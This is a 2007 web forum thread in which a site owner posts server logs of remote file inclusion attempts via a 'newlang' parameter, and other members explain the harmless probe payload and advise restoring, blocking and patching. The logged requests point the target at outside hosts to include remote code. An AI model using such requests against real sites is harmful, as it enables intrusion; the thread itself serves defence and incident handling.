Site Hacked, I Think

New Member Joined: Nov 18, 2007 Posts: 7 Location: Sweden

Hi there,

I am using vers 2.10.01 and the latest Sentinel installed but I woke up this morning to find someone had tried to hack my site. I don't know exactly what they have done but the site is now throwing up a 500 Internal Server Error, though upon checking they appear to have deleted the .htaccess and .staccess files on the server. I was going to re-up a backup of the site but wondered, if they got in they might be waiting for me to do that and try something again. I have checked the cPanel logs and the following is what its saying, I hope this is'nt too much info!

165.228.128.11 - - [13/Dec/2007:21:39:45 -0500] "GET /index.php?newlang=http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F HTTP/1.1" 200 1322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.71.147.77 - - [13/Dec/2007:21:39:47 -0500] "GET /index.php?newlang=http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F HTTP/1.0" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.228.133.11 - - [13/Dec/2007:21:39:48 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.208.44.48 - - [13/Dec/2007:21:39:52 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Checking the IP in the email Sentinel sent me when it blocked them said they originate from Australia (165.228.128.11) There are 2 lines in the email which say the following:

Query String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/
Get String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/

Does anyone know what h**p://lnx.sarapica.net/art/ufo/uco/ is? I don't have a clue.

The site I had only had a main page, nothing else, no forum, chat page, gallery, nothing.

Does anyone have and ideas what they have done/tried to do? Should I restore a backup? Any help or info would be appreciated. I have also informed my host and awaiting there reply but thought I would ask you guys as well.

Thanks,

Anthony

Posted: Fri Dec 14, 2007 6:06 am

Hmmmmm.....I would restore from backup and set the string blocker to ban sarapica

At first look it looks like a remote injection attempt but the url

comes back to....

Code:

<?php echo md5("just_a_test");?>

Code:

http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F

Comes back with the same....

I do not know if this would do anything...I will let someone in the know reply to that part....

Dave

Posted: Fri Dec 14, 2007 10:06 am

Thanks Dawg for the speedy reply. I restored a backup but it was corrupt Crying or Very sad

I

have just reinstalled everything again, hopefully everything will be ok

Anthony

Posted: Fri Dec 14, 2007 10:09 am

Anyone can BackUp...it is those that can restore that matter!

Dawg

Posted: Fri Dec 14, 2007 12:27 pm

Hahaha you are right Dawg!!

I have just been hit 3 times in succession, luckily Sentinel blocked them. The IP's are (if anyone wants to block them too) are:

194.150.247.1
211.142.116.205
201.134.177.1

Not checked them out yet

Anthony

registered · Posted: Fri Dec 14, 2007 3:04 pm

Hmm RavenNuke should be protected from that. "newlang" is a old vulnerability.
If you see any others attacks to different scripts that worked, let us know

Posted: Fri Dec 14, 2007 3:45 pm

Code:

<?php echo md5("just_a_test");?>

evaders99,
What were they trying to do with this?

Dawg

registered · Posted: Fri Dec 14, 2007 7:34 pm

I think they were just probing whether an include of their file would actually work. But, why the md5 function is interesting...

I have checked the RN code around $newlang and I just cannot see at first glance how it can be exploited. Definitely let us know (in private please) if you find anything else.

Posted: Fri Dec 14, 2007 10:54 pm

Dawg wrote:

Code:

<?php echo md5("just_a_test");?>

evaders99,
What were they trying to do with this?

Dawg

I wondered the same when I clicked on the links in the emails Sentinel sent me when they blocked the last 3 IP's, interesting.

Thanks alot for all the help/info, much appreciated.

Anthony

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Dawg wrote:

What were they trying to do with this?

Since the code was exposed it seems obvious that their script did not work. If it had it would have shown c6db3524fe71d6c576098805a07e79e4. md5() in *nuke is only used for passwords so my guess is that they were probing in order to develop their next baby, or should I say kiddie, step killing me

I would guess that they have successfully exploited these sites and are basically using them as mindless drones. I doubt that the owners of the sites even know they have been compromised.

http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F
which is h*tp://lnx.sarapica.net/art/ufo/uco/

http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F
which is h*tp://btnflower.com/pay/log/orak/toja/

http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F
which is h*tp://www.insanechicken.com//phpMyAdmin/libraries/anera/ijuraz/

http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F
which is h*tp://www.ujoo.co.kr/images/bar/ojilub/izemuf/

Try to contact the owners of the above mentioned sites and let them know that they have been compromised and are being used in an attempt to exploit other sites and that they will be implicated in Internet terrorism. Yes, these acts are classified as terrorism. Don't ya just love it?

Posted: Fri Dec 14, 2007 11:53 pm

Yep simple probe scripts. These testers just want some valid data to show their attacks worked. It could be a simple echo, so why md5? Who knows.

Posted: Sat Dec 15, 2007 6:31 am

Many, many thanks for all your help, its very much appreciated.

Its nice to know theres a group of people like you lot who take the time to help people like myself.

@ Raven,

I will try and inform the owners of the sites that have been comprimised, I am sure they would be interested to know!

Anthony

Posted: Sat Dec 15, 2007 7:36 am

Worker Joined: Jan 18, 2008 Posts: 143

They are still at it.....

195.235.59.37 from this IP
Sentinal picking up this hack attempt and sending me the link of the contaned info:

Code:

<?php echo md5 ("just_a_test");?>

Isnt the md5 part of the cgi folder?

Posted: Fri Jan 18, 2008 9:39 pm

They are all automated these days. No way to stop them.

That is just a probe to tell the automated script: "hey this user is vulnerable"
Once this tester is done (it isn't malicious itself), then the script can run whatever file with other commands to continue the hack.

md5 has no importance here. They could have easily just echo'd out any text.

Posted: Fri Jan 18, 2008 10:21 pm

so if sentinal picked it up that means im safe right?

Posted: Sat Jan 19, 2008 9:39 pm

Yes. Just keep your site patched and you'll be fine

Posted: Sun Jan 20, 2008 11:08 am

its uptodate. just waiting for the next version of ravennukes version Smile